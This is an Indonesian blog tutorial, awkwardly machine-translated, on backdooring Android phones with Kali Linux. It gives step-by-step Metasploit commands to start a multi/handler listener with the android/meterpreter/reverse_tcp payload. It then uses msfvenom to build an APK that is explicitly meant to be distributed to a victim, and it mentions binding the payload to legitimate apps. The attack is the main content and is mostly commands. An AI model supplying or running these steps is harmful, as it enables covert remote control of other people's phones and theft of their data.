Bobol Android dengan Metasploit di Kali Linux

Mei 24, 2016
Dalam tutorial ini, kita akan melihat bagaimana untuk membuat file apk yang menggunakan alat di Kali Linux. Kali Linux adalah distro Linux  alat hacking dan framework yang dapat melayani berbagai tujuan dalam berbagai fase pengujian penetrasi. Dalam tutorial ini, kita akan fokus pada Metasploit Android berbasis payload dengan alat msfvenom untuk membuat apk file backdoor. Baca juga Cara Bobol WiFi dengan Kali Linux

Membuat apk backdoor dan memulai mengeksploitasi dengan multi handler

Langkah 1:

Membuka Kali Linux OS di Oracle VM VirtualBox.
Default login:
akar toor
Login ke mesin virtual Kali Linux menggunakan kredensial default yang diberikan di atas.


Langkah 2:

Memverifikasi alamat IP dari mesin Kali.
Perintah:
ifconfig
Buka terminal di Kali Linux, dan mencatat alamat IP dari sistem. Kami akan menggunakan alamat IP ini dalam mengeksploitasi kami.

Langkah 3:

Buka Metasploit framework.
Dari terminal:
msfconsole
Setelah Anda memverifikasi dan mencatat alamat IP, kami akan membuka konsol MSF untuk membuat pendengar untuk mengeksploitasi kami.

Langkah 4:

Menggunakan Metasploit multi/handler.
Perintah:
msf >use exploit/multi/handler
Dalam Metasploit, menggunakan perintah menggunakan model tertentu dari rangka. Dalam kasus ini, kita ingin menggunakan multi handler mengeksploitasi, yang memfasilitasi mendengarkan koneksi wildcard yang masuk.

Langkah 5:

Cari payload multi handler
Perintah:
msf > search android/meterpreter
Anda dapat menggunakan perintah 'pencarian' dalam msfconsole untuk mencari kata kunci. Dalam kasus ini, kita akan mencari payload Android meterpreter.

Langkah 6:

Mengatur muatan di Metasploit
Perintah: msf > set payload android/meterpreter/reverse_tcp
Bersama dengan perintah 'use' dan 'search', 'set' adalah perintah lain yang digunakan dalam Metasploit untuk mengatur payload tertentu untuk mengeksploitasi.

Langkah 7:

Lihat opsi-opsi dari mengeksploitasi payload
Perintah: msf > show options
Kita dapat menggunakan perintah 'Tampilkan pilihan' untuk melihat berbagai masukan mengeksploitasi yang diperlukan untuk menjalankan berhasil.

Langkah 8:

Menetapkan LHOST dan LPORT
Perintah: msf > mengatur LHOST < ip_address >
MSF > mengatur LPORT < port_number >

Langkah 9:

Mulai pendengar
Perintah: msf > mengeksploitasi
Setelah Anda mengetik mengeksploitasi, pendengar Anda seharusnya dan berjalan menunggu untuk koneksi wildcard yang masuk.


Langkah 10:

Membuat file APK yang menggunakan MSFvenom. Membuka terminal baru.
Perintah: msfvenom-p android/meterpreter/reverse_tcp LHOST=<ip_address> LPORT=<port_number> > filename.apk
Membuka terminal baru dan ketik perintah di atas untuk menghasilkan file apk yang akan didistribusikan kepada korban. Serangan lanjutan dapat dikejar oleh mengikat berkas-berkas ini dengan APKs yang sah, yang berada di luar cakupan Lab ini.


Artikel Terkait

Next Article
« Prev Post
Previous Article
Next Post »
Penulisan markup di komentar
  • Untuk menulis huruf bold silahkan gunakan <strong></strong> atau <b></b>.
  • Untuk menulis huruf italic silahkan gunakan <em></em> atau <i></i>.
  • Untuk menulis huruf underline silahkan gunakan <u></u>.
  • Untuk menulis huruf strikethrought silahkan gunakan <strike></strike>.
  • Untuk menulis kode HTML silahkan gunakan <code></code> atau <pre></pre> atau <pre><code></code></pre>, dan silahkan parse dulu kodenya pada kotak parser di bawah ini.
Konversi Code
Disqus
Silahkan Berkomentar Dengan